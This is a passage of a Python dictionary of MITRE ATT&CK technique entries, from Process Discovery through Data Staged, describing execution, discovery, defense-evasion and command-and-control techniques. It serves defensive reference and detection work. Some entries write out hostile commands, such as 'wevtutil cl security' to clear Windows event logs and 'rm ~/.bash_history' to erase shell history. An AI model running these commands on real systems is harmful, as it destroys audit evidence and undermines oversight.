                          '<code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the '
                          '<code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.',
           'name': 'Process Discovery',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1059': {'attack_id': 'T1059',
           'categories': ['execution'],
           'description': 'Adversaries may abuse command and script interpreters to execute commands, scripts, or '
                          'binaries. These interfaces and languages provide ways of interacting with computer systems '
                          'and are a common feature across many different platforms. Most systems come with some '
                          'built-in command-line interface and scripting capabilities, for example, macOS and Linux '
                          'distributions include some flavor of [Unix '
                          'Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include '
                          'the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and '
                          '[PowerShell](https://attack.mitre.org/techniques/T1059/001).\n'
                          '\n'
                          'There are also cross-platform interpreters such as '
                          '[Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly '
                          'associated with client applications such as '
                          '[JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) and [Visual '
                          'Basic](https://attack.mitre.org/techniques/T1059/005).\n'
                          '\n'
                          'Adversaries may abuse these technologies in various ways as a means of executing arbitrary '
                          'commands. Commands and scripts can be embedded in [Initial '
                          'Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure '
                          'documents or as secondary payloads downloaded from an existing C2. Adversaries may also '
                          'execute commands through interactive terminals/shells.',
           'name': 'Command and Scripting Interpreter',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1059.001': {'attack_id': 'T1059.001',
               'categories': ['execution'],
               'description': 'Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a '
                              'powerful interactive command-line interface and scripting environment included in the '
                              'Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell '
                              'to perform a number of actions, including discovery of information and execution of '
                              'code. Examples include the <code>Start-Process</code> cmdlet which can be used to run '
                              'an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally '
                              'or on a remote computer (though administrator permissions are required to use '
                              'PowerShell to connect to remote systems).\n'
                              '\n'
                              'PowerShell may also be used to download and run executables from the Internet, which '
                              'can be executed from disk or in memory without touching disk.\n'
                              '\n'
                              'A number of PowerShell-based offensive testing tools are available, including '
                              '[Empire](https://attack.mitre.org/software/S0363),  '
                              '[PowerSploit](https://attack.mitre.org/software/S0194), '
                              '[PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github '
                              'PSAttack)\n'
                              '\n'
                              'PowerShell commands/scripts can also be executed without directly invoking the '
                              "<code>powershell.exe</code> binary through interfaces to PowerShell's underlying "
                              '<code>System.Management.Automation</code> assembly DLL exposed through the .NET '
                              'framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan '
                              '2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR '
                              '2014)',
               'name': 'PowerShell',
               'platforms': ['Windows']},
 'T1059.002': {'attack_id': 'T1059.002',
               'categories': ['execution'],
               'description': 'Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting '
                              'language designed to control applications and parts of the OS via inter-application '
                              'messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can '
                              'be sent independently or easily scripted with AppleScript. These events can locate open '
                              'windows, send keystrokes, and interact with almost any open application locally or '
                              'remotely.\n'
                              '\n'
                              'Scripts can be run from the command-line via <code>osascript /path/to/script</code> or '
                              '<code>osascript -e "script here"</code>. Aside from the command line, scripts can be '
                              'executed in numerous ways including Mail rules, Calendar.app alarms, and Automator '
                              'workflows. AppleScripts can also be executed as plain text shell scripts by adding '
                              '<code>#!/usr/bin/osascript</code> to the start of the script file.(Citation: '
                              'SentinelOne AppleScript)\n'
                              '\n'
                              'AppleScripts do not need to call <code>osascript</code> to execute, however. They may '
                              'be executed from within mach-O binaries by using the macOS [Native '
                              'API](https://attack.mitre.org/techniques/T1106)s\xa0<code>NSAppleScript</code>\xa0or\xa0'
                              '<code>OSAScript</code>, both of which execute code independent of the '
                              '<code>/usr/bin/osascript</code> command line utility.\n'
                              '\n'
                              'Adversaries may abuse AppleScript to execute various behaviors, such as interacting '
                              'with an open SSH connection, moving to remote machines, and even presenting users with '
                              'fake dialog boxes. These events cannot start applications remotely (they can start them '
                              "locally), but they can interact with applications if they're already running remotely. "
                              'On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native '
                              'API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require '
                              'compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS '
                              'Red Team). Since this is a scripting language, it can be used to launch more common '
                              'techniques as well such as a reverse shell via '
                              '[Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware '
                              'Targets Macs)',
               'name': 'AppleScript',
               'platforms': ['macOS']},
 'T1059.003': {'attack_id': 'T1059.003',
               'categories': ['execution'],
               'description': 'Adversaries may abuse the Windows command shell for execution. The Windows command '
                              'shell (<code>cmd.exe</code>) is the primary command prompt on Windows systems. The '
                              'Windows command prompt can be used to control almost any aspect of a system, with '
                              'various permission levels required for different subsets of commands. \n'
                              '\n'
                              'Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential '
                              'commands to run, as well as normal scripting operations such as conditionals and loops. '
                              'Common uses of batch files include long or repetitive tasks, or the need to run the '
                              'same set of commands on multiple systems.\n'
                              '\n'
                              'Adversaries may leverage <code>cmd.exe</code> to execute various commands and payloads. '
                              'Common uses include <code>cmd.exe /c</code> to execute a single command, or abusing '
                              '<code>cmd.exe</code> interactively with input and output forwarded over a command and '
                              'control channel.',
               'name': 'Windows Command Shell',
               'platforms': ['Windows']},
 'T1059.004': {'attack_id': 'T1059.004',
               'categories': ['execution'],
               'description': 'Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are '
                              'the primary command prompt on Linux and macOS systems, though many variations of the '
                              'Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or '
                              'distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control '
                              'every aspect of a system, with certain commands requiring elevated privileges.\n'
                              '\n'
                              'Unix shells also support scripts that enable sequential execution of commands as well '
                              'as other typical programming operations such as conditionals and loops. Common uses of '
                              'shell scripts include long or repetitive tasks, or the need to run the same set of '
                              'commands on multiple systems.\n'
                              '\n'
                              'Adversaries may abuse Unix shells to execute various commands or payloads. Interactive '
                              'shells may be accessed through command and control channels or during lateral movement '
                              'such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also '
                              'leverage shell scripts to deliver and execute multiple commands on victims or as part '
                              'of payloads used for persistence.',
               'name': 'Unix Shell',
               'platforms': ['macOS', 'Linux']},
 'T1059.005': {'attack_id': 'T1059.005',
               'categories': ['execution'],
               'description': 'Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language '
                              'created by Microsoft with interoperability with many Windows technologies such as '
                              '[Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native '
                              'API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although '
                              'tagged as legacy with no planned future evolutions, VB is integrated and supported in '
                              'the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: '
                              'VB Microsoft)\n'
                              '\n'
                              'Derivative languages based on VB have also been created, such as Visual Basic for '
                              'Applications (VBA) and VBScript. VBA is an event-driven programming language built into '
                              'Microsoft Office, as well as several third-party applications.(Citation: Microsoft '
                              'VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate '
                              'the execution of tasks and other functionality on the host. VBScript is a default '
                              'scripting language on Windows hosts and can also be used in place of '
                              '[JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application '
                              '(HTA) webpages served to Internet Explorer (though most modern browsers do not come '
                              'with VBScript support).(Citation: Microsoft VBScript)\n'
                              '\n'
                              'Adversaries may use VB payloads to execute malicious commands. Common malicious usage '
                              'includes automating execution of behaviors with VBScript or embedding VBA content into '
                              '[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.',
               'name': 'Visual Basic',
               'platforms': ['Windows', 'macOS', 'Linux']},
 'T1059.006': {'attack_id': 'T1059.006',
               'categories': ['execution'],
               'description': 'Adversaries may abuse Python commands and scripts for execution. Python is a very '
                              'popular scripting/programming language, with capabilities to perform many functions. '
                              'Python can be executed interactively from the command-line (via the '
                              '<code>python.exe</code> interpreter) or via scripts (.py) that can be written and '
                              'distributed to different systems. Python code can also be compiled into binary '
                              'executables.\n'
                              '\n'
                              'Python comes with many built-in packages to interact with the underlying system, such '
                              'as file operations and device I/O. Adversaries can use these libraries to download and '
                              'execute commands or other scripts as well as perform various malicious behaviors.',
               'name': 'Python',
               'platforms': ['Linux', 'Windows', 'macOS']},
 'T1059.007': {'attack_id': 'T1059.007',
               'categories': ['execution'],
               'description': 'Adversaries may abuse JavaScript and/or JScript for execution. JavaScript (JS) is a '
                              'platform-agnostic scripting language (compiled just-in-time at runtime) commonly '
                              'associated with scripts in webpages, though JS can be executed in runtime environments '
                              'outside the browser.(Citation: NodeJS)\n'
                              '\n'
                              'JScript is the Microsoft implementation of the same scripting standard. JScript is '
                              'interpreted via the Windows Script engine and thus integrated with many components of '
                              'Windows such as the [Component Object '
                              'Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML '
                              'Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript '
                              '2007)(Citation: Microsoft Windows Scripts)\n'
                              '\n'
                              'Adversaries may abuse JavaScript / JScript to execute various behaviors. Common uses '
                              'include hosting malicious scripts on websites as part of a [Drive-by '
                              'Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing '
                              'these script files as secondary payloads. Since these payloads are text-based, it is '
                              'also very common for adversaries to obfuscate their content as part of [Obfuscated '
                              'Files or Information](https://attack.mitre.org/techniques/T1027).',
               'name': 'JavaScript/JScript',
               'platforms': ['Windows', 'macOS', 'Linux']},
 'T1059.008': {'attack_id': 'T1059.008',
               'categories': ['execution'],
               'description': 'Adversaries may abuse scripting or built-in command line interpreters (CLI) on network '
                              'devices to execute malicious command and payloads. The CLI is the primary means through '
                              'which users and administrators interact with the device in order to view system '
                              'information, modify device operations, or perform diagnostic and administrative '
                              'functions. CLIs typically contain various permission levels required for different '
                              'commands. \n'
                              '\n'
                              'Scripting interpreters automate tasks and extend functionality beyond the command set '
                              'included in the network OS. The CLI and scripting interpreter are accessible through a '
                              'direct console connection, or through remote means, such as telnet or secure shell '
                              '(SSH).\n'
                              '\n'
                              'Adversaries can use the network CLI to change how network devices behave and operate. '
                              'The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify '
                              'startup configuration parameters to load malicious system software, or to disable '
                              'security features or logging to avoid detection. (Citation: Cisco Synful Knock '
                              'Evolution)',
               'name': 'Network Device CLI',
               'platforms': ['Network']},
 'T1061': {'attack_id': 'T1061',
           'categories': ['execution'],
           'description': '**This technique has been deprecated. Please use [Remote '
                          'Services](https://attack.mitre.org/techniques/T1021) where appropriate.**\n'
                          '\n'
                          'The Graphical User Interfaces (GUI) is a common way to interact with an operating system. '
                          "Adversaries may use a system's GUI during an operation, commonly through a remote "
                          'interactive session such as [Remote Desktop '
                          'Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and '
                          'Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for '
                          'information and execute files via mouse double-click events, the Windows Run command '
                          '(Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.',
           'name': 'Graphical User Interface',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1062': {'attack_id': 'T1062',
           'categories': ['persistence'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'A type-1 hypervisor is a software layer that sits between the guest operating systems and '
                          "system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running "
                          'environment to an operating system. An example of a common hypervisor is Xen. (Citation: '
                          'Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could '
                          'be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide '
                          'its existence from the guest operating system. (Citation: Myers 2007) A malicious '
                          'hypervisor of this nature could be used to persist on systems through interruption.',
           'name': 'Hypervisor',
           'platforms': ['Windows']},
 'T1064': {'attack_id': 'T1064',
           'categories': ['defense-evasion', 'execution'],
           'description': '**This technique has been deprecated. Please use [Command and Scripting '
                          'Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**\n'
                          '\n'
                          'Adversaries may use scripts to aid in operations and perform multiple actions that would '
                          'otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the '
                          'time required to gain access to critical resources. Some scripting languages may be used to '
                          'bypass process monitoring mechanisms by directly interacting with the operating system at '
                          'an API level instead of calling other programs. Common scripting languages for Windows '
                          'include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also '
                          'be in the form of command-line batch scripts.\n'
                          '\n'
                          'Scripts can be embedded inside Office documents as macros that can be set to execute when '
                          'files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and '
                          'other types of spearphishing are opened. Malicious embedded macros are an alternative means '
                          'of execution than software exploitation through [Exploitation for Client '
                          'Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on '
                          'macros being allowed or that the user will accept to activate them.\n'
                          '\n'
                          'Many popular offensive frameworks exist which use forms of scripting for security testers '
                          'and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), '
                          'and PowerSploit (Citation: Powersploit) are three examples that are popular among '
                          'penetration testers for exploit and post-compromise operations and include many features '
                          'for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch '
                          '2014)',
           'name': 'Scripting',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1068': {'attack_id': 'T1068',
           'categories': ['privilege-escalation'],
           'description': 'Adversaries may exploit software vulnerabilities in an attempt to collect elevate '
                          'privileges. Exploitation of a software vulnerability occurs when an adversary takes '
                          'advantage of a programming error in a program, service, or within the operating system '
                          'software or kernel itself to execute adversary-controlled code. Security constructs such as '
                          'permission levels will often hinder access to information and use of certain techniques, so '
                          'adversaries will likely need to perform privilege escalation to include use of software '
                          'exploitation to circumvent those restrictions.\n'
                          '\n'
                          'When initially gaining access to a system, an adversary may be operating within a lower '
                          'privileged process which will prevent them from accessing certain resources on the system. '
                          'Vulnerabilities may exist, usually in operating system components and software commonly '
                          'running at higher permissions, that can be exploited to gain higher levels of access on the '
                          'system. This could enable someone to move from unprivileged or user level permissions to '
                          'SYSTEM or root permissions depending on the component that is vulnerable. This may be a '
                          'necessary step for an adversary compromising a endpoint system that has been properly '
                          'configured and limits other privilege escalation methods.',
           'name': 'Exploitation for Privilege Escalation',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1069': {'attack_id': 'T1069',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to find group and permission settings. This information can help '
                          'adversaries determine which user accounts and groups are available, the membership of users '
                          'in particular groups, and which users and groups have elevated permissions.',
           'name': 'Permission Groups Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'Azure AD', 'AWS', 'GCP', 'Azure', 'SaaS']},
 'T1069.001': {'attack_id': 'T1069.001',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to find local system groups and permission settings. The '
                              'knowledge of local system permission groups can help adversaries determine which groups '
                              'exist and which users belong to a particular group. Adversaries may use this '
                              'information to determine which users have elevated permissions, such as the users found '
                              'within the local administrators group.\n'
                              '\n'
                              'Commands such as <code>net localgroup</code> of the '
                              '[Net](https://attack.mitre.org/software/S0039) utility, <code>dscl . -list '
                              '/Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.',
               'name': 'Local Groups',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1069.002': {'attack_id': 'T1069.002',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to find domain-level groups and permission settings. The '
                              'knowledge of domain-level permission groups can help adversaries determine which groups '
                              'exist and which users belong to a particular group. Adversaries may use this '
                              'information to determine which users have elevated permissions, such as domain '
                              'administrators.\n'
                              '\n'
                              'Commands such as <code>net group /domain</code> of the '
                              '[Net](https://attack.mitre.org/software/S0039) utility,  <code>dscacheutil -q '
                              'group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level '
                              'groups.',
               'name': 'Domain Groups',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1069.003': {'attack_id': 'T1069.003',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to find cloud groups and permission settings. The knowledge of '
                              'cloud permission groups can help adversaries determine the particular roles of users '
                              'and groups within an environment, as well as which users are associated with a '
                              'particular group.\n'
                              '\n'
                              'With authenticated access there are several tools that can be used to find permissions '
                              'groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and '
                              'permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft '
                              'Msolrole)(Citation: GitHub Raindance)\n'
                              '\n'
                              'Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with '
                              'authenticated access to a domain. The command <code>az ad user get-member-groups</code> '
                              'will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: '
                              'Black Hills Red Teaming MS AD Azure, 2018)',
               'name': 'Cloud Groups',
               'platforms': ['Office 365', 'Azure AD', 'GCP', 'SaaS', 'Azure', 'AWS']},
 'T1070': {'attack_id': 'T1070',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may delete or alter generated artifacts on a host system, including logs or '
                          'captured files such as quarantined malware. Locations and format of logs are platform or '
                          'product-specific, however standard operating system logs are captured as Windows events or '
                          'Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and '
                          '/var/log/*.\n'
                          '\n'
                          'These actions may interfere with event collection, reporting, or other notifications used '
                          'to detect intrusion activity. This that may compromise the integrity of security solutions '
                          'by causing notable events to go unreported. This activity may also impede forensic analysis '
                          'and incident response, due to lack of sufficient data to determine what occurred.',
           'name': 'Indicator Removal on Host',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1070.001': {'attack_id': 'T1070.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows '
                              "Event Logs are a record of a computer's alerts and notifications. There are three "
                              'system-defined sources of events: System, Application, and Security, with five event '
                              'types: Error, Warning, Information, Success Audit, and Failure Audit.\n'
                              '\n'
                              'The event logs can be cleared with the following utility commands:\n'
                              '\n'
                              '* <code>wevtutil cl system</code>\n'
                              '* <code>wevtutil cl application</code>\n'
                              '* <code>wevtutil cl security</code>\n'
                              '\n'
                              'These logs may also be cleared through other mechanisms, such as the event viewer GUI '
                              'or [PowerShell](https://attack.mitre.org/techniques/T1059/001).',
               'name': 'Clear Windows Event Logs',
               'platforms': ['Windows']},
 'T1070.002': {'attack_id': 'T1070.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux '
                              'both keep track of system or user-initiated actions via system logs. The majority of '
                              'native system logging is stored under the <code>/var/log/</code> directory. Subfolders '
                              'in this directory categorize logs by their related functions, such as:(Citation: Linux '
                              'Logs)\n'
                              '\n'
                              '* <code>/var/log/messages:</code>: General and system-related messages\n'
                              '* <code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs\n'
                              '* <code>/var/log/utmp</code> or <code>/var/log/wtmp</code>: Login records\n'
                              '* <code>/var/log/kern.log</code>: Kernel logs\n'
                              '* <code>/var/log/cron.log</code>: Crond logs\n'
                              '* <code>/var/log/maillog</code>: Mail server logs\n'
                              '* <code>/var/log/httpd/</code>: Web server access and error logs\n',
               'name': 'Clear Linux or Mac System Logs',
               'platforms': ['Linux', 'macOS']},
 'T1070.003': {'attack_id': 'T1070.003',
               'categories': ['defense-evasion'],
               'description': 'In addition to clearing system logs, an adversary may clear the command history of a '
                              'compromised account to conceal the actions undertaken during an intrusion. Various '
                              'command interpreters keep track of the commands users type in their terminal so that '
                              "users can retrace what they've done.\n"
                              '\n'
                              'On Linux and macOS, these command histories can be accessed in a few different ways. '
                              'While logged in, this command history is tracked in a file pointed to by the '
                              'environment variable <code>HISTFILE</code>. When a user logs off a system, this '
                              "information is flushed to a file in the user's home directory called "
                              '<code>~/.bash_history</code>. The benefit of this is that it allows users to go back to '
                              "commands they've used before in different sessions.\n"
                              '\n'
                              'Adversaries may delete their commands from these logs by manually clearing the history '
                              '(<code>history -c</code>) or deleting the bash history file <code>rm '
                              '~/.bash_history</code>.\n'
                              '\n'
                              'On Windows hosts, PowerShell has two different command history providers: the built-in '
                              'history and the command history managed by the <code>PSReadLine</code> module. The '
                              'built-in history only tracks the commands used in the current session. This command '
                              'history is not available to other sessions and is deleted when the session ends.\n'
                              '\n'
                              'The <code>PSReadLine</code> command history tracks the commands used in all PowerShell '
                              'sessions and writes them to a file '
                              '(<code>$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt</code> '
                              'by default). This history file is available to all sessions and contains all past '
                              'history since the file is not deleted when the session ends.(Citation: Microsoft '
                              'PowerShell Command History)\n'
                              '\n'
                              'Adversaries may run the PowerShell command <code>Clear-History</code> to flush the '
                              'entire command history from a current PowerShell session. This, however, will not '
                              'delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete '
                              'the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell '
                              'commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos '
                              'PowerShell Command History Forensics)',
               'name': 'Clear Command History',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1070.004': {'attack_id': 'T1070.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may delete files left behind by the actions of their intrusion activity. '
                              'Malware, tools, or other non-native files dropped or created on a system by an '
                              'adversary may leave traces to indicate to what was done within a network and how. '
                              'Removal of these files can occur during an intrusion, or as part of a post-intrusion '
                              "process to minimize the adversary's footprint.\n"
                              '\n'
                              'There are tools available from the host operating system to perform cleanup, but '
                              'adversaries may use other tools as well. Examples include native '
                              '[cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion '
                              'tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. '
                              '(Citation: Trend Micro APT Attack Tools)',
               'name': 'File Deletion',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1070.005': {'attack_id': 'T1070.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may remove share connections that are no longer useful in order to clean up '
                              'traces of their operation. Windows shared drive and [Windows Admin '
                              'Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no '
                              'longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility '
                              'that can be used to remove network share connections with the <code>net use '
                              '\\\\system\\share /delete</code> command. (Citation: Technet Net Use)',
               'name': 'Network Share Connection Removal',
               'platforms': ['Windows']},
 'T1070.006': {'attack_id': 'T1070.006',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify file time attributes to hide new or changes to existing files. '
                              'Timestomping is a technique that modifies the timestamps of a file (the modify, access, '
                              'create, and change times), often to mimic files that are in the same folder. This is '
                              'done, for example, on files that have been modified or created by the adversary so that '
                              'they do not appear conspicuous to forensic investigators or file analysis tools.\n'
                              '\n'
                              'Timestomping may be used along with file name '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and '
                              'tools.(Citation: WindowsIR Anti-Forensic Techniques)',
               'name': 'Timestomp',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1071': {'attack_id': 'T1071',
           'categories': ['command-and-control'],
           'description': 'Adversaries may communicate using application layer protocols to avoid detection/network '
                          'filtering by blending in with existing traffic. Commands to the remote system, and often '
                          'the results of those commands, will be embedded within the protocol traffic between the '
                          'client and server. \n'
                          '\n'
                          'Adversaries may utilize many different protocols, including those used for web browsing, '
                          'transferring files, electronic mail, or DNS. For connections that occur internally within '
                          'an enclave (such as those between a proxy or pivot node and other nodes), commonly used '
                          'protocols are SMB, SSH, or RDP. ',
           'name': 'Application Layer Protocol',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1071.001': {'attack_id': 'T1071.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may communicate using application layer protocols associated with web '
                              'traffic to avoid detection/network filtering by blending in with existing traffic. '
                              'Commands to the remote system, and often the results of those commands, will be '
                              'embedded within the protocol traffic between the client and server. \n'
                              '\n'
                              'Protocols such as HTTP and HTTPS that carry web traffic may be very common in '
                              'environments. HTTP/S packets have many fields and headers in which data can be '
                              'concealed. An adversary may abuse these protocols to communicate with systems under '
                              'their control within a victim network while also mimicking normal, expected traffic. ',
               'name': 'Web Protocols',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1071.002': {'attack_id': 'T1071.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may communicate using application layer protocols associated with '
                              'transferring files to avoid detection/network filtering by blending in with existing '
                              'traffic. Commands to the remote system, and often the results of those commands, will '
                              'be embedded within the protocol traffic between the client and server. \n'
                              '\n'
                              'Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in '
                              'environments.  Packets produced from these protocols may have many fields and headers '
                              'in which data can be concealed. Data could also be concealed within the transferred '
                              'files. An adversary may abuse these protocols to communicate with systems under their '
                              'control within a victim network while also mimicking normal, expected traffic. ',
               'name': 'File Transfer Protocols',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1071.003': {'attack_id': 'T1071.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may communicate using application layer protocols associated with '
                              'electronic mail delivery to avoid detection/network filtering by blending in with '
                              'existing traffic. Commands to the remote system, and often the results of those '
                              'commands, will be embedded within the protocol traffic between the client and server. \n'
                              '\n'
                              'Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very '
                              'common in environments.  Packets produced from these protocols may have many fields and '
                              'headers in which data can be concealed. Data could also be concealed within the email '
                              'messages themselves. An adversary may abuse these protocols to communicate with systems '
                              'under their control within a victim network while also mimicking normal, expected '
                              'traffic. ',
               'name': 'Mail Protocols',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1071.004': {'attack_id': 'T1071.004',
               'categories': ['command-and-control'],
               'description': 'Adversaries may communicate using the Domain Name System (DNS) application layer '
                              'protocol to avoid detection/network filtering by blending in with existing traffic. '
                              'Commands to the remote system, and often the results of those commands, will be '
                              'embedded within the protocol traffic between the client and server. \n'
                              '\n'
                              'The DNS protocol serves an administrative function in computer networking and thus may '
                              'be very common in environments. DNS traffic may also be allowed even before network '
                              'authentication is completed. DNS packets contain many fields and headers in which data '
                              'can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to '
                              'communicate with systems under their control within a victim network while also '
                              'mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium '
                              'DnsTunneling) ',
               'name': 'DNS',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1072': {'attack_id': 'T1072',
           'categories': ['execution', 'lateral-movement'],
           'description': 'Adversaries may gain access to and use third-party software suites installed within an '
                          'enterprise network, such as administration, monitoring, and deployment systems, to move '
                          'laterally through the network. Third-party applications and software deployment systems may '
                          'be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, '
                          'Altiris, etc.).\n'
                          '\n'
                          'Access to a third-party network-wide or enterprise-wide software system may enable an '
                          'adversary to have remote code execution on all systems that are connected to such a system. '
                          'The access may be used to laterally move to other systems, gather information, or cause a '
                          'specific effect, such as wiping the hard drives on all endpoints.\n'
                          '\n'
                          'The permissions required for this action vary by system configuration; local credentials '
                          'may be sufficient with direct access to the third-party system, or specific domain '
                          'credentials may be required. However, the system may require an administrative account to '
                          "log in or to perform it's intended purpose.",
           'name': 'Software Deployment Tools',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1074': {'attack_id': 'T1074',
           'categories': ['collection'],
           'description': 'Adversaries may stage collected data in a central location or directory prior to '
                          'Exfiltration. Data may be kept in separate files or combined into one file through '
                          'techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). '
                          'Interactive command shells may be used, and common functionality within '
                          '[cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a '
                          'staging location.(Citation: PWC Cloud Hopper April 2017)\n'
                          '\n'
                          'In cloud environments, adversaries may stage data within a particular instance or virtual '
                          'machine before exfiltration. An adversary may [Create Cloud '
                          'Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that '
                          'instance.(Citation: Mandiant M-Trends 2020)\n'
                          '\n'
                          'Adversaries may choose to stage data from a victim network in a centralized location prior '
                          'to Exfiltration to minimize the number of connections made to their C2 server and better '
                          'evade detection.',
           'name': 'Data Staged',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure']},
 'T1074.001': {'attack_id': 'T1074.001',
               'categories': ['collection'],
               'description': 'Adversaries may stage collected data in a central location or directory on the local '
                              'system prior to Exfiltration. Data may be kept in separate files or combined into one '
                              'file through techniques such as [Archive Collected '
                              'Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be '
                              'used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) '
                              'and bash may be used to copy data into a staging location.',
               'name': 'Local Data Staging',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1074.002': {'attack_id': 'T1074.002',
               'categories': ['collection'],
               'description': 'Adversaries may stage data collected from multiple systems in a central location or '
                              'directory on one system prior to Exfiltration. Data may be kept in separate files or '
                              'combined into one file through techniques such as [Archive Collected '
                              'Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be '
                              'used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) '
                              'and bash may be used to copy data into a staging location.\n'
                              '\n'
                              'In cloud environments, adversaries may stage data within a particular instance or '
                              'virtual machine before exfiltration. An adversary may [Create Cloud '
                              'Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that '
                              'instance.(Citation: Mandiant M-Trends 2020)\n'
